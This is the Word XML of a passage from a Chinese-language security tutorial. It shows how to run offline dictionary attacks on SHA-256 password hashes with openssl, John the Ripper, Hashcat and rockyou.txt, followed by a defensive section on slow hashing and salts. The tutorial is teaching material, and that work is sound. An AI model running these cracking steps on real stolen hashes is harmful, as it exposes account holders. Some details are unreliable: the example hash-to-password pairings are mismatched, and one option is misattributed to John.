      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"testpassword"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dgst </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sha256</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r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然后手工在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中写入多个哈希（可包含不同口令的摘要），文件格式兼容</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的明文哈希模式。例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（这些哈希对应的口令分别是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但此处不作为已知信息。）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="243"/>
    <w:bookmarkStart w:id="244" w:name="使用-john-the-ripper-进行字典攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> John the Ripper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行字典攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">John </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会自动检测哈希类型，也可显式指定格式。字典使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自带的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（需解压）或自建字典。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--wordlist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（标注②）：John</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会加载哈希、识别类型并开始尝试。如果字典中包含匹配的口令，会输出类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;password&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的行，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;password&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是破解出的明文，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是占位用户名或空。如果字典中不包含这些口令，John</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终会显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“No password hashes cracked, …”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。后续可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看已破解的列表。输出中的候选项和进度因实际环境而异。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="244"/>
    <w:bookmarkStart w:id="245" w:name="使用-hashcat-进行字典攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行字典攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要显式指定哈希类型模式。对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256，模式为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。可先用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的哈希类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hashid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashes.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查看可能模式</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1400 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 hashes.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 1400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-a 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为字典攻击模式。Hashcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会显示设备、速度（H/s）和进度。若成功，会在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Recovered”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后显示破解数量。完成后用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat --show -m 1400 -a 0 hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（标注②）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">成功破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：输出显示明文口令，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f2ca1bb...:password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这并不表示口令强度不足，仅说明其存在于字典中且哈希匹配。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">破解失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Recovered…: 0/2”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。可能原因：①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字典中不包含该口令（可尝试更大字典或掩码攻击）；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希类型模式错误（若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与实际哈希算法不符，所有对比均失败，此时需用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新识别）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">哈希类型错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：常见排错方法是先确认哈希算法，通过长度和前缀初步判断。若不确定，可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--hash-type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">让</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> John </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动探测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令与目标的占位说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上述命令中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;HASHFILE&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DICT&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;MODE&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须替换为读者实验室中的实际值。本节绝不对特定口令或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作出承诺，一切取决于环境配置与字典。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="245"/>
    <w:bookmarkEnd w:id="246"/>
    <w:bookmarkStart w:id="247" w:name="防御对照框强口令-慢哈希-kdf-唯一盐-限制泄露面"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框】强口令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">慢哈希</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDF + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">唯一盐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制泄露面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与修复措施</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">离线攻击的根源在于哈希数据库的泄露，防御必须覆盖存储层、运维层与用户教育层：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">密码存储策略（核心）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使用强慢哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> KDF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：首选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt、Argon2id、scrypt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PBKDF2-HMAC-SHA256（满足</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-63B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准）。为每个账户生成唯一且不可预测的盐，长度至少为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位（16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节）随机字符串。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置适当的迭代次数/成本因子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使得每次验证耗费约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒（可接受的用户体验内最大化成本）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绝对禁止</w:t>
      </w:r>
